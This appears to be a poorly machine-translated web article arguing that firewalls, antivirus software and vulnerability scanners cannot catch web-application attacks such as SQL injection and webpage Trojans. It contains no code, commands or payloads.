Website design security: what are the security measures for the site

A website design er is more thinking about how to meet the user's application and how to implement the business. Rarely consider the exist of web application development in the process of these loopholes, loopholes in the security code design personnel do not pay attention to the eyes of almost invisible, most developers, website design and website maintenance personnel to understand website defense technology is little; in the course of normal use, even if the existence of security vulnerabilities, normal users are not aware of. But when hackers are aware of loopholes and make full use of them, vulnerabilities exist on websites, and they become opportunities for hackers to gain benefits directly or indirectly. For the SQL injection vulnerability of Web applications, experiments show that 11.3% SQL injection vulnerabilities are detected by searching for 1000 site sampling tests.

The site environment has undergone great changes, more of a threat from the Web application layer, and the safety measures most of the site is still in the original basis of threat awareness, and even whether the site has been compromised and the implementation of the pages linked to horse, often in the investigation of visitor complaints or regulatory authorities is only aware of at this time, but has caused irreparable loss. A lot of people will ask: my website has already had security measures, and this kind of thing will still happen. Why is it? Let's analyze the existing security measures.
Firewall, anti-virus, vulnerability scanning are all widely used traditional website security measures, especially the deployment of firewall, which prevents websites from attacking most of them from the network layer, and plays an important role. But in the face of the new situation, are these traditional security measures able to deal with it?
firewall
After enabling the network access control policy, the firewall can block access to other service ports of the website, and only allow access to the HTTP service port, so that vulnerability scanning and attack attempts based on other protocols and service ports will be blocked. But for the popular Web application layer attack, its behavior is similar to a normal Web access. Firewall is unable to recognize and prevent. Once blocking, it will mean that normal Web access will also be cut off.
Antivirus
No matter it is deployed on gateway or website server, anti virus system can detect and protect virus effectively, but it can't identify malicious code in webpage, that is webpage Trojan horse. Because webpage Trojan usually appears as a normal script in web page program, it is possible to download harmful programs or steal the victim's privacy directly when it is executed. In the same way, anti virus systems are more difficult to identify for vulnerabilities in Web applications.
Vulnerability scanning
Operating system vulnerabilities, vulnerability database, publishing system in the search and repair site (such as IIS, Apache etc.) vulnerabilities, vulnerability scanning system plays a significant role, but as a general vulnerability scanning system, the recognition of Web vulnerabilities and are limited, the reason is Web application vulnerability is not a specific software or the service of the loopholes, the complex and diverse forms, usually based on automatic inspection tools, through manual review to be accurate positioning.
To sum up, identifying and blocking attacks based on Web vulnerabilities is hard to do by traditional security measures, such as vulnerability scanning, network access control, virus detection and protection. In view of the new website security threat, we should keep enough urgency and take effective measures to deal with it.